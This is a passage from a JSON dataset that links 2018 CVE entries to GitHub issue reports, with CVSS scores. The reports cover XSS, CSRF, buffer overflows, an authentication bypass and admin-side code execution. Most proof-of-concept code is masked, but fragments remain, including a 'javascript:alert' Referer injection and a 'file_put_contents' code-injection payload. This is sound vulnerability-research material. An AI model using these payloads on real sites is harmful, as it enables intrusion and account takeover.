  25606. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25607. "severity": "MEDIUM",
  25608. "baseScore": 6.1,
  25609. "impactScore": 2.7,
  25610. "exploitabilityScore": 2.8
  25611. },
  25612. {
  25613. "CVE_ID": "CVE-2018-17039",
  25614. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/24",
  25615. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/24",
  25616. "Repo_new": "bg5sbk/minicms",
  25617. "Issue_Created_At": "2018-09-04T04:39:38Z",
  25618. "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability because \"echo $_SERVER['REQUEST_URI'];\" in NUMBERTAG line FILETAG CODETAG php APITAG APITAG \");",
  25619. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25620. "severity": "MEDIUM",
  25621. "baseScore": 6.1,
  25622. "impactScore": 2.7,
  25623. "exploitabilityScore": 2.8
  25624. },
  25625. {
  25626. "CVE_ID": "CVE-2018-17042",
  25627. "Issue_Url_old": "https://github.com/bcsanches/dbf2txt/issues/2",
  25628. "Issue_Url_new": "https://github.com/bcsanches/dbf2txt/issues/2",
  25629. "Repo_new": "bcsanches/dbf2txt",
  25630. "Issue_Created_At": "2018-08-23T04:36:57Z",
  25631. "description": "Infinite Loop. I used Clang NUMBERTAG and APITAG to build dbf2txt URLTAG , in order to build it with clang in APITAG , the APITAG and APITAG should be modified as follows: ERRORTAG This FILETAG can cause infinite loop when executing this command: APITAG",
  25632. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25633. "severity": "MEDIUM",
  25634. "baseScore": 5.5,
  25635. "impactScore": 3.6,
  25636. "exploitabilityScore": 1.8
  25637. },
  25638. {
  25639. "CVE_ID": "CVE-2018-17043",
  25640. "Issue_Url_old": "https://github.com/tsfn/doc2txt/issues/1",
  25641. "Issue_Url_new": "https://github.com/tsfn/doc2txt/issues/1",
  25642. "Repo_new": "tsfn/doc2txt",
  25643. "Issue_Created_At": "2018-08-23T04:49:52Z",
  25644. "description": "Heap Buffer Overflow in Function Storage::init. I used g NUMBERTAG and APITAG to build doc2txt URLTAG , this FILETAG can cause heap buffer overflow in function Storage::init in Storage.cpp when executing this command(pic is just a folder which is used to store the picture in doc file): APITAG This is the ASAN information: ERRORTAG",
  25645. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25646. "severity": "HIGH",
  25647. "baseScore": 7.8,
  25648. "impactScore": 5.9,
  25649. "exploitabilityScore": 1.8
  25650. },
  25651. {
  25652. "CVE_ID": "CVE-2018-17045",
  25653. "Issue_Url_old": "https://github.com/maelosoki/MaeloStore/issues/1",
  25654. "Issue_Url_new": "https://github.com/maelosoki/maelostore/issues/1",
  25655. "Repo_new": "maelosoki/maelostore",
  25656. "Issue_Created_At": "2018-08-11T07:41:07Z",
  25657. "description": "Here is a CSRF vulnerability that can change administrator password.. APITAG is a CSRF vulnerability that can change administrator password via APITAG poc: APITAG change the administrator password CODETAG",
  25658. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25659. "severity": "HIGH",
  25660. "baseScore": 8.8,
  25661. "impactScore": 5.9,
  25662. "exploitabilityScore": 2.8
  25663. },
  25664. {
  25665. "CVE_ID": "CVE-2018-17046",
  25666. "Issue_Url_old": "https://github.com/magic-FE/translate-man/issues/49",
  25667. "Issue_Url_new": "https://github.com/magic-fe/translate-man/issues/49",
  25668. "Repo_new": "magic-fe/translate-man",
  25669. "Issue_Created_At": "2018-08-15T04:40:08Z",
  25670. "description": "Cross site scripting attack vulnerability. This plugin has the function of automatic translation after word segmentation. When XSS statements are entered, malicious code is executed. For example, \u54c8\u54c8\u54c8 \"> APITAG \" \u6b64\u65f6\u4f1a\u628a\u4e2d\u6587\u7ffb\u8bd1\u6210\u82f1\u6587\uff0c\u5e76\u4e14\u6267\u884cxss\u8bed\u53e5 This will translate Chinese into English and execute XSS statement. FILETAG FILETAG FILETAG",
  25671. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25672. "severity": "MEDIUM",
  25673. "baseScore": 6.1,
  25674. "impactScore": 2.7,
  25675. "exploitabilityScore": 2.8
  25676. },
  25677. {
  25678. "CVE_ID": "CVE-2018-17049",
  25679. "Issue_Url_old": "https://github.com/TREYWANGCQU/LANKERS/issues/1",
  25680. "Issue_Url_new": "https://github.com/treywangcqu/lankers/issues/1",
  25681. "Repo_new": "treywangcqu/lankers",
  25682. "Issue_Created_At": "2018-09-09T13:59:19Z",
  25683. "description": "there is a XSS vuln can bypass waf. Hello lankers! I find a reflective XSS can bypass waf in your product,the filter is not complete that such as long \"on\" function and the confirm function,I hope you can fix the problem! poc : URLTAG APITAG APITAG FILETAG FILETAG",
  25684. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25685. "severity": "MEDIUM",
  25686. "baseScore": 6.1,
  25687. "impactScore": 2.7,
  25688. "exploitabilityScore": 2.8
  25689. },
  25690. {
  25691. "CVE_ID": "CVE-2018-17051",
  25692. "Issue_Url_old": "https://github.com/adilinden/cisco-config-manager/issues/3",
  25693. "Issue_Url_new": "https://github.com/adilinden-oss/cisco-config-manager/issues/3",
  25694. "Repo_new": "adilinden-oss/cisco-config-manager",
  25695. "Issue_Created_At": "2018-09-14T02:44:53Z",
  25696. "description": "Hello, safety Cross site scripting attack vulnerability. Hello, safety Cross site scripting attack APITAG details are as follows NUMBERTAG FILETAG [id parameter] Request GET /cisco APITAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; Edit Device APITAG APITAG alert NUMBERTAG APITAG fe NUMBERTAG z\"> ...[SNIP NUMBERTAG FILETAG [id parameter] Request GET /cisco APITAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; Edit Device APITAG APITAG alert NUMBERTAG APITAG aw0wt\"> ...[SNIP NUMBERTAG FILETAG [name of an arbitrarily supplied URL parameter] Request GET PATHTAG NUMBERTAG APITAG h0gz5 HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: URLTAG Response HTTP NUMBERTAG OK Date: Thu NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Content Length NUMBERTAG Connection: close Content Type: text/html APITAG APITAG APITAG APITAG APITAG Devices &gt; List Devices APITAG APITAG alert NUMBERTAG APITAG h0gz5?action=add\"> ...[SNIP NUMBERTAG parameters are listed here, and there are also loopholes in other parameters directly displayed.",
  25697. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25698. "severity": "MEDIUM",
  25699. "baseScore": 6.1,
  25700. "impactScore": 2.7,
  25701. "exploitabilityScore": 2.8
  25702. },
  25703. {
  25704. "CVE_ID": "CVE-2018-17069",
  25705. "Issue_Url_old": "https://github.com/unlcms/UNL-CMS/issues/941",
  25706. "Issue_Url_new": "https://github.com/unlcms/unl-cms/issues/941",
  25707. "Repo_new": "unlcms/unl-cms",
  25708. "Issue_Created_At": "2018-08-04T08:30:31Z",
  25709. "description": "There are two CSRF vulnerabilities that can create new content or update the website settings. APITAG is a CSRF vulnerability that can create new content via APITAG poc: APITAG create a new content ERRORTAG APITAG is a CSRF vulnerability that can update the website settings via APITAG APITAG poc: APITAG update the website settings ERRORTAG",
  25710. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  25711. "severity": "MEDIUM",
  25712. "baseScore": 6.5,
  25713. "impactScore": 3.6,
  25714. "exploitabilityScore": 2.8
  25715. },
  25716. {
  25717. "CVE_ID": "CVE-2018-17072",
  25718. "Issue_Url_old": "https://github.com/tunnuz/json/issues/11",
  25719. "Issue_Url_new": "https://github.com/tunnuz/json/issues/11",
  25720. "Repo_new": "tunnuz/json",
  25721. "Issue_Created_At": "2018-08-13T06:13:31Z",
  25722. "description": "buffer overflow while testing. I run test.cc and get the following message... Should I write something like \"delete A\" at somewhere NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c0 at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG b NUMBERTAG f0 sp NUMBERTAG ffe NUMBERTAG b NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG c0 thread T NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG efb3 in parse_file(char const ) PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG db NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG c4 is located NUMBERTAG bytes to the right of global variable 'yyleng' defined in PATHTAG NUMBERTAG c0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG ac NUMBERTAG f9 f9 f NUMBERTAG ad0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ae NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG af0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  25723. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25724. "severity": "CRITICAL",
  25725. "baseScore": 9.8,
  25726. "impactScore": 5.9,
  25727. "exploitabilityScore": 3.9
  25728. },
  25729. {
  25730. "CVE_ID": "CVE-2018-17073",
  25731. "Issue_Url_old": "https://github.com/wernsey/bitmap/issues/1",
  25732. "Issue_Url_new": "https://github.com/wernsey/bitmap/issues/1",
  25733. "Repo_new": "wernsey/bitmap",
  25734. "Issue_Created_At": "2018-08-14T07:13:38Z",
  25735. "description": "SEGV on unknown access while get a bmp's width. System: Ubuntu NUMBERTAG Compile use: clang++ with asan, libpng, libjpeg Here's my program: ERRORTAG and here is my bmp: FILETAG APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG df0 sp NUMBERTAG ffc6aced1f0 T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG in bm_width PATHTAG NUMBERTAG f7e in main PATHTAG NUMBERTAG fd NUMBERTAG af7fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in bm_width NUMBERTAG ABORTING",
  25736. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  25737. "severity": "HIGH",
  25738. "baseScore": 7.5,
  25739. "impactScore": 3.6,
  25740. "exploitabilityScore": 3.9
  25741. },
  25742. {
  25743. "CVE_ID": "CVE-2018-17075",
  25744. "Issue_Url_old": "https://github.com/golang/go/issues/27016",
  25745. "Issue_Url_new": "https://github.com/golang/go/issues/27016",
  25746. "Repo_new": "golang/go",
  25747. "Issue_Created_At": "2018-08-16T03:11:50Z",
  25748. "description": "PATHTAG APITAG panic caused by malformed data. What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG Analysis There are many reasons for panic, but the main reason is: APITAG does not handle some special APITAG meanwhile ERRORTAG does handle these special APITAG thus causing panic. Other test cases that cause the same problem: APITAG System details CODETAG",
  25749. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  25750. "severity": "HIGH",
  25751. "baseScore": 7.5,
  25752. "impactScore": 3.6,
  25753. "exploitabilityScore": 3.9
  25754. },
  25755. {
  25756. "CVE_ID": "CVE-2018-17076",
  25757. "Issue_Url_old": "https://github.com/logological/gpp/issues/26",
  25758. "Issue_Url_new": "https://github.com/logological/gpp/issues/26",
  25759. "Repo_new": "logological/gpp",
  25760. "Issue_Created_At": "2018-09-14T02:04:09Z",
  25761. "description": "gpp: Segmentation fault. When using the file below, GPP will try to use more memory space than is available on the stack. FILETAG This can lead to denial of service attacks, even remote code execution in specific situations",
  25762. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25763. "severity": "HIGH",
  25764. "baseScore": 8.8,
  25765. "impactScore": 5.9,
  25766. "exploitabilityScore": 2.8
  25767. },
  25768. {
  25769. "CVE_ID": "CVE-2018-17077",
  25770. "Issue_Url_old": "https://github.com/wacj1425/yiqicms/issues/1",
  25771. "Issue_Url_new": "https://github.com/wacj1425/yiqicms/issues/1",
  25772. "Repo_new": "wacj1425/yiqicms",
  25773. "Issue_Created_At": "2018-08-25T16:56:01Z",
  25774. "description": "There is a storage xss vulnerability in comment title. FILETAG code show as below. Only length restrictions are applied to the $msgtitle. So caused a loophole. We can use / / to bypass the length limit. For example, the first comment title input \" APITAG alert NUMBERTAG and second input NUMBERTAG APITAG \". View comments in the background to trigger the vulnerability. CODETAG",
  25775. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25776. "severity": "MEDIUM",
  25777. "baseScore": 6.1,
  25778. "impactScore": 2.7,
  25779. "exploitabilityScore": 2.8
  25780. },
  25781. {
  25782. "CVE_ID": "CVE-2018-17079",
  25783. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/38",
  25784. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/38",
  25785. "Repo_new": "94fzb/zrlog",
  25786. "Issue_Created_At": "2018-09-18T15:55:09Z",
  25787. "description": "There is a stored XSS in the article review area. Comment area does not do input filtering Poc ERRORTAG",
  25788. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25789. "severity": "MEDIUM",
  25790. "baseScore": 6.1,
  25791. "impactScore": 2.7,
  25792. "exploitabilityScore": 2.8
  25793. },
  25794. {
  25795. "CVE_ID": "CVE-2018-17095",
  25796. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/51",
  25797. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/51",
  25798. "Repo_new": "mpruett/audiofile",
  25799. "Issue_Created_At": "2018-07-26T10:56:49Z",
  25800. "description": "A heap buffer overflow has occurred when running sfconvert. A heap buffer overflow has occurred when running sfconvert ERRORTAG And the input file has been put at: URLTAG",
  25801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25802. "severity": "HIGH",
  25803. "baseScore": 8.8,
  25804. "impactScore": 5.9,
  25805. "exploitabilityScore": 2.8
  25806. },
  25807. {
  25808. "CVE_ID": "CVE-2018-17095",
  25809. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/50",
  25810. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/50",
  25811. "Repo_new": "mpruett/audiofile",
  25812. "Issue_Created_At": "2018-07-26T10:48:55Z",
  25813. "description": "A heap buffer overflow has occurred when running sfconvert. A heap buffer overflow has occurred when running sfconvert. ERRORTAG And the input file has been put at: URLTAG",
  25814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25815. "severity": "HIGH",
  25816. "baseScore": 8.8,
  25817. "impactScore": 5.9,
  25818. "exploitabilityScore": 2.8
  25819. },
  25820. {
  25821. "CVE_ID": "CVE-2018-17102",
  25822. "Issue_Url_old": "https://github.com/quickapps/cms/issues/199",
  25823. "Issue_Url_new": "https://github.com/quickapps/cms/issues/199",
  25824. "Repo_new": "quickapps/cms",
  25825. "Issue_Created_At": "2018-08-10T11:57:05Z",
  25826. "description": "CSRF issue that allows attacker to change the administrator password. There is a CSRF vulnerability has been found in the quickappscms,which can change administrator's password. After the administrator login in ,open this html page: POC: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  25827. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25828. "severity": "HIGH",
  25829. "baseScore": 8.8,
  25830. "impactScore": 5.9,
  25831. "exploitabilityScore": 2.8
  25832. },
  25833. {
  25834. "CVE_ID": "CVE-2018-17102",
  25835. "Issue_Url_old": "https://github.com/quickapps/cms/issues/187",
  25836. "Issue_Url_new": "https://github.com/quickapps/cms/issues/187",
  25837. "Repo_new": "quickapps/cms",
  25838. "Issue_Created_At": "2018-03-27T05:55:25Z",
  25839. "description": "CSRF issue that allows attacker to create an account. Hello. I'd like to report a security issue on the admin page. Summary this vuln is CSRF vuln that allows creating any kinds of account. When an attacker induce authorized victims to a malicious webpage and make them send requests. a victim creates an account without their intent. Reproduce This is a step how to reproduce NUMBERTAG Access to the html page has payload content after you login to admin( PATHTAG ) page. Then you find an admin account named [test] is created. Payloads CODETAG I think this security issue is not serious. Because attack using this vulnerability requires induction. Event NUMBERTAG this vulnerability is discovered NUMBERTAG Open an issue on Github.",
  25840. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25841. "severity": "HIGH",
  25842. "baseScore": 8.8,
  25843. "impactScore": 5.9,
  25844. "exploitabilityScore": 2.8
  25845. },
  25846. {
  25847. "CVE_ID": "CVE-2018-17103",
  25848. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1295",
  25849. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1295",
  25850. "Repo_new": "getsimplecms/getsimplecms",
  25851. "Issue_Created_At": "2018-08-24T06:49:03Z",
  25852. "description": "APITAG NUMBERTAG allows CSRF to change the administrator account's password. in FILETAG . APITAG NUMBERTAG allows CSRF to change the administrator account's password. After the administrator logs in, open the poc, the administrator account's password will be changed to NUMBERTAG POC: CODETAG",
  25853. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25854. "severity": "HIGH",
  25855. "baseScore": 8.8,
  25856. "impactScore": 5.9,
  25857. "exploitabilityScore": 2.8
  25858. },
  25859. {
  25860. "CVE_ID": "CVE-2018-17104",
  25861. "Issue_Url_old": "https://github.com/microweber/microweber/issues/484",
  25862. "Issue_Url_new": "https://github.com/microweber/microweber/issues/484",
  25863. "Repo_new": "microweber/microweber",
  25864. "Issue_Created_At": "2018-08-31T12:33:55Z",
  25865. "description": "There is a CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following page to add an administrator. POC: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  25866. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25867. "severity": "HIGH",
  25868. "baseScore": 8.8,
  25869. "impactScore": 5.9,
  25870. "exploitabilityScore": 2.8
  25871. },
  25872. {
  25873. "CVE_ID": "CVE-2018-17104",
  25874. "Issue_Url_old": "https://github.com/microweber/microweber/issues/483",
  25875. "Issue_Url_new": "https://github.com/microweber/microweber/issues/483",
  25876. "Repo_new": "microweber/microweber",
  25877. "Issue_Created_At": "2018-08-31T01:19:15Z",
  25878. "description": "There is a CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following page to add an administrator. POC: CODETAG",
  25879. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25880. "severity": "HIGH",
  25881. "baseScore": 8.8,
  25882. "impactScore": 5.9,
  25883. "exploitabilityScore": 2.8
  25884. },
  25885. {
  25886. "CVE_ID": "CVE-2018-17106",
  25887. "Issue_Url_old": "https://github.com/vbirds/Tinyftp/issues/4",
  25888. "Issue_Url_new": "https://github.com/vbirds/tinyftp/issues/4",
  25889. "Repo_new": "vbirds/tinyftp",
  25890. "Issue_Created_At": "2018-08-10T06:45:12Z",
  25891. "description": "Remote Buffer Overflow problem. Hey, sir. Buffer overflow exists in the text variable of the do_mkd function in the ftpproto.c APITAG ebp when new folder and absolute path name length exceeds NUMBERTAG char text NUMBERTAG it just NUMBERTAG byte char dir NUMBERTAG getcwd(dir, sizeof(dir)); sprintf(text, \" %s%s created\", dir, sess >arg);//it more then NUMBERTAG",
  25892. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  25893. "severity": "HIGH",
  25894. "baseScore": 7.5,
  25895. "impactScore": 3.6,
  25896. "exploitabilityScore": 3.9
  25897. },
  25898. {
  25899. "CVE_ID": "CVE-2018-17107",
  25900. "Issue_Url_old": "https://github.com/tgstation/tgstation-server/issues/690",
  25901. "Issue_Url_new": "https://github.com/tgstation/tgstation-server/issues/690",
  25902. "Repo_new": "tgstation/tgstation-server",
  25903. "Issue_Created_At": "2018-09-20T19:12:04Z",
  25904. "description": "You can login to the server with any username/password combination if someone else is logged in. An explanation of the bug: Back in NUMBERTAG in order to accommodate running the Control Panel using Mono some hooks were added to the WCF communication layer. Detailed in this commit: URLTAG The bug was in this line: URLTAG APITAG is passed in by the framework but the documentation for what the parameter is is virtually non existent: URLTAG Turns out it is a cache of what the previously returned policy was, as Floyd thankfully found out for us. The security patch fixes the issue by creating a new empty list as the return value when password authentication fails as opposed to using the APITAG parameter. If you're wondering why this line: URLTAG didn't prevent the issue. It only invalidated the actual Windows login session, but in the eyes of the server the user was still valid since we just passed that closed handle as a return result. Had access to static files been attempted with a bad login, the request would end up erroring due to trying to impersonate using a closed user token handle. CVETAG This has been fixed in APITAG and versions NUMBERTAG",
  25905. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  25906. "severity": "CRITICAL",
  25907. "baseScore": 9.8,
  25908. "impactScore": 5.9,
  25909. "exploitabilityScore": 3.9
  25910. },
  25911. {
  25912. "CVE_ID": "CVE-2018-17113",
  25913. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/7",
  25914. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/7",
  25915. "Repo_new": "teameasy/easycms",
  25916. "Issue_Created_At": "2018-09-14T04:08:20Z",
  25917. "description": "there is a xss vuln in your product. Hi\uff0cteameasy\uff01 When I use your cms,I found a xss vuln in your APITAG flash version is the key of the problem,i hope you can fix it soon. thx FILETAG",
  25918. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25919. "severity": "MEDIUM",
  25920. "baseScore": 6.1,
  25921. "impactScore": 2.7,
  25922. "exploitabilityScore": 2.8
  25923. },
  25924. {
  25925. "CVE_ID": "CVE-2018-17129",
  25926. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/2",
  25927. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/2",
  25928. "Repo_new": "panghusec/exploit",
  25929. "Issue_Created_At": "2018-08-15T06:27:44Z",
  25930. "description": "metinfo NUMBERTAG FILETAG APITAG Vulnerability . POC: APITAG download the metinfo the Latest version from URLTAG url FILETAG APITAG install it and login as admin APITAG request URLTAG url FILETAG",
  25931. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  25932. "severity": "MEDIUM",
  25933. "baseScore": 4.9,
  25934. "impactScore": 3.6,
  25935. "exploitabilityScore": 1.2
  25936. },
  25937. {
  25938. "CVE_ID": "CVE-2018-17130",
  25939. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/3",
  25940. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/3",
  25941. "Repo_new": "panghusec/exploit",
  25942. "Issue_Created_At": "2018-08-15T08:02:20Z",
  25943. "description": "phpmywind NUMBERTAG Persistent(stored) XSS. Attackers can get admin's Cookie and do other things APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG register an ordinary user and find an article to comment FILETAG NUMBERTAG find an article to comment such as URLTAG FILETAG NUMBERTAG use burpsuite and modify Referer,such as APITAG javascript:alert(/panghu from APITAG FILETAG APITAG as Admin and request FILETAG to review user's comments and click the comment that includes the xss payload",
  25944. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25945. "severity": "MEDIUM",
  25946. "baseScore": 5.4,
  25947. "impactScore": 2.7,
  25948. "exploitabilityScore": 2.3
  25949. },
  25950. {
  25951. "CVE_ID": "CVE-2018-17131",
  25952. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/5",
  25953. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/5",
  25954. "Repo_new": "panghusec/exploit",
  25955. "Issue_Created_At": "2018-08-15T09:32:16Z",
  25956. "description": "phpmywind NUMBERTAG Code Execution2. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG FILETAG (select number!!!!!) payload NUMBERTAG file_put_contents(\"../ FILETAG \",\"just a test\"); FILETAG NUMBERTAG then the payload is written in the FILETAG FILETAG then in root directory panghusec.txt will be created: ) In summary: from FILETAG Insert data into database and in lines NUMBERTAG enter APITAG function and code execution :)",
  25957. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25958. "severity": "HIGH",
  25959. "baseScore": 7.2,
  25960. "impactScore": 5.9,
  25961. "exploitabilityScore": 1.2
  25962. },
  25963. {
  25964. "CVE_ID": "CVE-2018-17132",
  25965. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/4",
  25966. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/4",
  25967. "Repo_new": "panghusec/exploit",
  25968. "Issue_Created_At": "2018-08-15T08:52:24Z",
  25969. "description": "phpmywind NUMBERTAG Code Execution1. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request URLTAG FILETAG",
  25970. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25971. "severity": "HIGH",
  25972. "baseScore": 7.2,
  25973. "impactScore": 5.9,
  25974. "exploitabilityScore": 1.2
  25975. },
  25976. {
  25977. "CVE_ID": "CVE-2018-17133",
  25978. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/6",
  25979. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/6",
  25980. "Repo_new": "panghusec/exploit",
  25981. "Issue_Created_At": "2018-08-15T10:06:27Z",
  25982. "description": "phpmywind NUMBERTAG Code Execution3. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG and inject the code APITAG FILETAG NUMBERTAG then request URLTAG FILETAG FILETAG",
  25983. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25984. "severity": "HIGH",
  25985. "baseScore": 7.2,
  25986. "impactScore": 5.9,
  25987. "exploitabilityScore": 1.2
  25988. },
  25989. {
  25990. "CVE_ID": "CVE-2018-17134",
  25991. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/7",
  25992. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/7",
